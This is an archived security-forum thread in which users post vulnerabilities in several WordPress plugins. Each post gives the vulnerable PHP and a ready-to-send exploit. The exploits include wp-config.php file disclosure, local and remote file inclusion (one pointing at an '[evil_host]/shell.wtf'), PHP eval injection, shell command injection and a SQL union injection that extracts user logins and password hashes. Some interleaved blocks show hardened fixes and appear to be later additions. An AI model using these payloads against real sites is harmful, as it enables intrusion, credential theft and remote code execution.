RDot: White Hat Security Community

RDot: White Hat Security Community (https://rdot.org/forum/index.php)
-   Scripts/CMF/CMS (https://rdot.org/forum/forumdisplay.php?f=15)
-   -   WordPress and plugin vulnerabilities (https://rdot.org/forum/showthread.php?t=68)

RulleR 05.07.2010 12:58

WordPress and plugin vulnerabilities
 
Plugin name: myEASYbackup (download)
Version: 0.1.3

File Disclosure

Vuln file: /wp-content/plugins/myeasybackup/meb_download.php
PHP code:

/*...*/
$tmp = explode('://', $_SERVER['HTTP_REFERER']);
$path = explode('/', $tmp[1]);
$referer = $path[0];

if(    ($_SERVER['HTTP_HOST'] != $_SERVER['SERVER_NAME'])
        || ($_SERVER['HTTP_HOST'] != $referer)
        || ($_SERVER['SERVER_NAME'] != $referer) )
{
/*...*/
    echo 'Nice try, you cheeky monkey!';    #    0.0.5
    return;
}
/*...*/
$file_name = $_POST['dwn_file'];    #    0.0.5

$file = MEBAK_BACKUP_PATH . '/' . $file_name;
/*...*/
if(file_exists($file))
{
/*...*/
    readfile($file);


Exploit:
Code:

POST http://[host]/[path]/wp-content/plugins/myeasybackup/meb_download.php HTTP/1.0
Referer: http://[host]

dwn_file=[path]/wp-config.php


RulleR 05.07.2010 13:00

WordPress Plugin [WP PageFlip Lite] Local File Inclusion Vulnerability
 
Plugin name: WP PageFlip Lite (download)
Version: 1.4.2

Local File Inclusion

Vuln file: /wp-content/plugins/wp-pageflip/wp_pageflip.php
PHP code:

/*...*/
if (isset($_POST['pageflip_language'])) $pageflip_language = $_POST['pageflip_language'];
else $pageflip_language = get_option('pageflip_language');
if ($pageflip_language != '') include($plugin_dir.'languages/'.$pageflip_language);
/*...*/

Exploit:
Code:

POST http://[host]/[path]/wp-content/plugins/wp-pageflip/wp_pageflip.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

pageflip_language=../../../../../../../[local_file]


RulleR 05.07.2010 13:02

WordPress Plugin [WP Emaily] File Disclosure Vulnerability
 
Plugin name: WP Emaily (download)
Version: 0.8

File Disclosure

Vuln file: /wp-content/plugins/wp-emaily/wp-emaily-zip-creation.php
PHP code:

/*...*/
$filedata = WPEmaily::readFile(WPEMAILY_PATH.'emails/'.$_GET['filename']);
/*...*/
// add the binary data stored in the string 'filedata'
$zipfile->add_file($filedata, $dir."/index.html");

// the next three lines force an immediate download of the zip file:
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: private",false);
header("Content-Type: application/zip");
header("Content-disposition: attachment; filename={$_GET['filename']}.zip");
header("Content-Transfer-Encoding: binary");
header("Content-Length: ".filesize($name));

echo $zipfile->file();
/*...*/

# file: /wp-content/plugins/wp-emaily/wp-emaily-class.php

function readFile ($filename)
{
    if ( ! file_exists($filename) || ! $fp = @fopen($filename, 'rb')) {
        return FALSE;
    }
    flock($fp, LOCK_SH);

    $dump = '';
    if (filesize($filename) > 0) {
        $dump = fread($fp, filesize($filename));
    }

    flock($fp, LOCK_UN);
    fclose($fp);

    return $dump;
}

Exploit:
Code:

http://[host]/[path]/wp-content/plugins/wp-emaily/wp-emaily-zip-creation.php?filename=../../../../wp-config.php
Note: The output is a zip archive in which the file /email/index.html contains the WP config.

RulleR 05.07.2010 13:04

WordPress Plugin [BuzzFeed] PHP Code Execution Vulnerability
 
Plugin name: BuzzFeed (download)
Version: 1.1.4

PHP Code Execution

Vuln file: /wp-content/plugins/buzzfeed/preview.php
PHP code:

/*...*/
if( isset( $_POST[ "previewTemplate" ] ) && $_POST[ "previewTemplate" ] == "on" && $_POST[ "templateChanged" ] == "true" ){
    $cols = $config[ "cols" ];
    $rows = $config[ "rows" ];
    $tempTemplate = "";

    $bf = new BuzzFeed( $config );
    $buzzes = $bf->getBuzzes();

    ob_start();
    eval( "?>{$_POST['template']}" );// :D
    $contents = ob_get_contents();
    ob_end_clean();
/*...*/

Exploit:
Code:

POST http://[host]/[path]/wp-content/plugins/buzzfeed/preview.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

previewTemplate=on&templateChanged=true&template=<?phpinfo()?>

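The same preview rendered without eval(), as an added example that is not BuzzFeed's code: the template stays plain HTML with {{field}} placeholders, only listed fields are substituted and each value is HTML-escaped, so nothing in the request body can be compiled as PHP. The field names are assumptions, not the plugin's schema.

```php
<?php
// Added example, not BuzzFeed's code: render the preview template without eval().
// Instead of handing the request body to the PHP parser, the template is plain
// HTML with {{field}} placeholders; only the listed fields are substituted and
// each value is HTML-escaped, so nothing in the submitted text can run as code.
function render_preview(string $template, array $buzzes, array $fields): string {
    $out = '';
    foreach ($buzzes as $buzz) {
        $map = [];
        foreach ($fields as $field) {
            $value = (string)($buzz[$field] ?? '');
            $map['{{' . $field . '}}'] = htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
        }
        // strtr() replaces only the placeholders; everything else is copied verbatim.
        $out .= strtr($template, $map);
    }
    return $out;
}

// Constructed sample data; the field names are assumptions, not BuzzFeed's schema.
// The preview endpoint itself should also require an authenticated, authorized user.
$fields = ['title', 'url'];
$buzzes = [
    ['title' => 'First <b>buzz</b>', 'url' => 'https://example.invalid/1'],
    ['title' => 'Second "buzz"',     'url' => 'https://example.invalid/2'],
];
$template = '<li><a href="{{url}}">{{title}}</a></li>' . "\n";
echo render_preview($template, $buzzes, $fields);

// The payload shape from the exploit above comes back as inert text: the
// string "<?php phpinfo() ?>" is returned, never compiled.
echo htmlspecialchars(render_preview('<?php phpinfo() ?>', [['title' => 'x']], $fields)), "\n";
```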

RulleR 05.07.2010 13:06

WordPress Plugin [Custom Field List Widget] Remote File Inclusion Vulnerability
 
Plugin name: Custom Field List Widget (download)
Version: 1.1.1

Remote File Inclusion

Vuln file: /wp-content/plugins/custom-field-list-widget/widget_custom_field_list_individual_href_save_data.php
PHP code:

/*...*/
<?php
if (isset($_POST['abspath'])) {
    require_once(urldecode($_POST['abspath']).'wp-config.php');
    if ( FALSE == function_exists('wp_verify_nonce') or FALSE == wp_verify_nonce($_POST['_ajax_nonce'], 'customfieldlist_dbaction_security') ) {
        die(__('Security Check failed!','customfieldlist'));
/*...*/

Need: allow_url_include = On
Exploit:
Code:

POST http://[host]/[path]/wp-content/plugins/custom-field-list-widget/widget_custom_field_list_individual_href_save_data.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

abspath=http://[evil_host]/shell.wtf?


oRb 05.07.2010 13:27

Plugin name: UnGallery
Version: 0.8

Remote File Disclosure
PHP code:

if ($_GET['pic']) {
    $filename = $_GET['pic'];
    $len = filesize($filename);
    $lastslash = strrpos($filename, "/");
    $name = substr($filename, $lastslash + 1);

    header("Content-type: image/jpeg;\r\n");
    header("Content-Length: $len;\r\n");
    header("Content-Transfer-Encoding: binary;\r\n");
    header('Content-Disposition: inline; filename="'.$name.'"');    //  Render the photo inline.
    readfile($filename);
}


Code:

$ curl http://wordpress/wp-content/plugins/ungallery/source.php?pic=../../../wp-config.php
Shell Command Execution
PHP code:

$dir = "wp-content/plugins/ungallery/pics/" . $_GET['zip'];

// Create the arrays with the dir's image files
$dp = opendir($dir);
while ($filename = readdir($dp)) {
    if (!is_dir($dir."/pics/".$gallery."/".$filename))  {                                      // If it's a file, begin
        $pic_types = array("JPG", "jpg", "GIF", "gif", "PNG", "png");
        if (in_array(substr($filename, -3), $pic_types)) $pic_array[] = $filename;                // If it's a image, add it to pic array
    }
}
foreach ($pic_array as $filename) {
    $media_files = $media_files . " " . $dir . "/" . $filename;
}

$output = `zip -u -j $dir/pics.zip $media_files`;

print "<pre>$output</pre>";
print 'Complete. The file can be downloaded <a href="./wp-content/plugins/ungallery/source.php?zip=pics/' . $_GET['zip'] . '/pics.zip">here</a>';
print '<br><br>You can return to the gallery <a href="./gallery?gallerylink=' . $_GET['zip'] .'">here.</a>';

Code:

http://wordpress/wp-content/plugins/ungallery/zip.php?zip=non_existing_dir+non_existing_file;ls;pwd;
ps: XSS can be pulled off here as well
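A hardened version of the zip.php step above, as an added example that is not UnGallery's code: the gallery name is validated, the directory is confined under the pics base with realpath(), and ZipArchive replaces the backtick call so the request value never reaches a shell. The demo directory and file names are constructed; ext/zip is assumed to be available.

```php
<?php
// Added example, not UnGallery's code: build the gallery archive without a shell.
// The gallery name from the request must match a strict pattern, the resolved
// directory must stay under the pics base, and ZipArchive replaces the
// backtick `zip -u -j ...` call, so no request value ever reaches /bin/sh.
function build_gallery_zip(string $picsBase, string $gallery): string {
    // Plain directory names only: no slashes, dots, spaces or shell metacharacters.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $gallery)) {
        throw new InvalidArgumentException('invalid gallery name');
    }
    $base = realpath($picsBase);
    $dir  = realpath($picsBase . DIRECTORY_SEPARATOR . $gallery);
    if ($base === false || $dir === false || !is_dir($dir)
        || strpos($dir, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('gallery not found');
    }
    $zipPath = $dir . DIRECTORY_SEPARATOR . 'pics.zip';
    $zip = new ZipArchive();                       // requires ext/zip
    if ($zip->open($zipPath, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== true) {
        throw new RuntimeException('cannot create archive');
    }
    foreach (scandir($dir) as $name) {
        $file = $dir . DIRECTORY_SEPARATOR . $name;
        $ext  = strtolower(pathinfo($name, PATHINFO_EXTENSION));
        if (is_file($file) && in_array($ext, ['jpg', 'gif', 'png'], true)) {
            $zip->addFile($file, $name);           // bare name: same flattening as zip -j
        }
    }
    $zip->close();
    return $zipPath;
}

// Constructed demonstration in a temp directory; no web server or gallery needed.
$picsBase = sys_get_temp_dir() . '/ungallery_demo_pics';
@mkdir($picsBase . '/holiday', 0700, true);
file_put_contents($picsBase . '/holiday/a.jpg', 'constructed jpeg bytes');
echo build_gallery_zip($picsBase, 'holiday'), "\n";

// The payload shape from the post is refused before anything touches the filesystem.
foreach (['non_existing_dir+non_existing_file;ls;pwd;', '../../../wp-config.php'] as $bad) {
    try {
        build_gallery_zip($picsBase, $bad);
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $bad, "\n";
    }
}
```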

RulleR 05.07.2010 13:40

WordPress Plugin [jRSS Widget] File Disclosure Vulnerability
 
Plugin name: jRSS Widget (download)
Version: 1.0

File Disclosure

Vuln file: /wp-content/plugins/jrss-widget/proxy.php
PHP code:

header('Content-type: application/xml');
$handle = fopen($_REQUEST['url'], "r");

if ( $handle ) {
    while ( !feof($handle) ) {
        $buffer = fgets($handle, 4096);
        echo $buffer;
    }
    fclose($handle);
}


Exploit:
Code:

POST http://[host]/[path]/wp-content/plugins/jrss-widget/proxy.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

url=../../../wp-config.php


Strilo4ka 06.07.2010 18:39

Plugin name: Count per Day (download)
Version: 2.10.1

SQL inj

Vuln file: wp-content/plugins/count-per-day/notes.php
PHP code:

/*...*/
if ( isset($_POST['month']) )
    $month = $_POST['month'];
else if ( isset($_GET['month']) )
    $month = $_GET['month'];
else
    $month = date('m');

if ( isset($_POST['month']) )
    $year = $_POST['year'];
else if ( isset($_GET['year']) )
    $year = $_GET['year'];
else
    $year = date('Y');

/*...*/
$where = '';
if ( $month )
    $where .= " AND MONTH(date) = $month ";
if ( $year )
    $where .= " AND YEAR(date) = $year ";
$notes = $wpdb->get_results('SELECT * FROM '.$table_prefix.'cpd_notes WHERE 1 '.$where.' ORDER BY date DESC', ARRAY_A);

/*...*/
else
        {
            ?>
            <tr>
                <td><?php echo $row['date']; ?></td>
                <td><?php echo $row['note']; ?></td>
                <td><input type="image" src="cpd_pen.png" name="edit_<?php echo $row['id']; ?>" title="<?php _e('edit', 'cpd'); ?>" style="width:auto;" /></td>
            </tr>
            <?php
        }
/*...*/

Exploit:
Code:

http://[host]/[path]/plugins/count-per-day/notes.php?month=1 and 0 union select 1,2,concat_ws(0x3a,user_login,user_pass) from wp_users limit 0,1/*
Note: Can also be done via POST
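The notes query with month and year bound as integers through $wpdb->prepare(), as an added example that is not Count per Day's code. It assumes WordPress's global $wpdb object (class wpdb), which is not defined here; cpd_month_year() alone runs stand-alone.

```php
<?php
// Added example, not Count per Day's code: the notes query with month and year
// bound through $wpdb->prepare() instead of being interpolated into the SQL.
// Assumes WordPress's global $wpdb object (class wpdb), which is not defined here.
function cpd_month_year(array $post, array $get): array {
    // Same precedence as the plugin (POST, then GET, then today), but the values
    // are cast to int and range-checked, so "1 and 0 union select ..." collapses
    // to 1 before it gets anywhere near the query.
    $month = (int)($post['month'] ?? $get['month'] ?? date('m'));
    $year  = (int)($post['year']  ?? $get['year']  ?? date('Y'));
    if ($month < 1 || $month > 12)    { $month = (int)date('m'); }
    if ($year < 1970 || $year > 9999) { $year  = (int)date('Y'); }
    return [$month, $year];
}

function cpd_notes_sql(wpdb $wpdb, int $month, int $year): string {
    // %d placeholders are formatted by prepare(); the table name comes from the
    // configured prefix, never from the request.
    return $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}cpd_notes WHERE 1 AND MONTH(date) = %d AND YEAR(date) = %d ORDER BY date DESC",
        $month,
        $year
    );
}

// Usage inside notes.php (WordPress context):
// [$month, $year] = cpd_month_year($_POST, $_GET);
// $notes = $wpdb->get_results(cpd_notes_sql($wpdb, $month, $year), ARRAY_A);
// When rendering, echo esc_html($row['note']) rather than the raw column value.
```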

Strilo4ka 06.07.2010 18:40

Plugin name: Eventify - Simple Events (download)
Version: 1.6.e

Local File Inclusion

Vuln file: /wp-content/plugins/eventify/php/ajax/fetcheventdetails.php
PHP code:

require_once(str_ireplace("/wp-content","",$_POST['npath']).'/wp-load.php');
$eventid = $_POST['eventid'];
$action = "fetch";

if($action=="fetch"){
    global $wpdb;
    $table_name = $wpdb->prefix."em_main";
    $qry = "select * from ".$table_name." where em_id='$eventid'" ;
    //echo $qry;
    $results = $wpdb->get_results($qry);
    echo '<div class="event_title">'.$results[0]->em_title.'</div>
        <div class="event_description"><em>Description:</em> '.$results[0]->em_desc.'</div>
        <div class="event_venue"><em>Venue:</em> '.$results[0]->em_venue.'</div>
        <div class="event_time"><em>Time:</em> '.$results[0]->em_time.'</div>
        ';
    //echo $qry;
}

Exploit:
Code:

POST
http://[host]/[path]/wp-content/plugins/eventify/php/ajax/fetcheventdetails.php
npath=../../readme.txt%00

Note: I wanted to do an injection as well, but damn, the quote gets escaped (if a WordPress file is included)... Maybe there is some file in WordPress that would allow successful exploitation of the injection! I'm not writing "need" because there is the %00 substitute. It won't work in new versions. In the previous plugins it can also be done via cookies, I forgot, since it's in $_REQUEST and cookies. ;)

Strilo4ka 06.07.2010 18:40

Plugin name: GRAND Flash Album Gallery (download)

Version: 0.48
Updated: 2010-6-5
Downloads: 76,908

File reader (or paths, if PHP < 5)

Vuln file: wp-content\plugins\flash-album-gallery\admin\news.php
PHP code:

<?php
extract($_POST);
$str = file_get_contents($want2Read); echo $want2Read;
echo $str;
?>

Exploit:
Code:

POST
want2Read=../../../../license.txt

<form action="http://[host]/wp-content/plugins/flash-album-gallery/admin/news.php" method=post>
<input name=want2Read type=text value="../readme.txt">
<input type=submit>
</form>

The DB connection constants are here:
Code:

../../../../wp-config.php


Time zone GMT +3, time: 01:51.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Translation: zCarot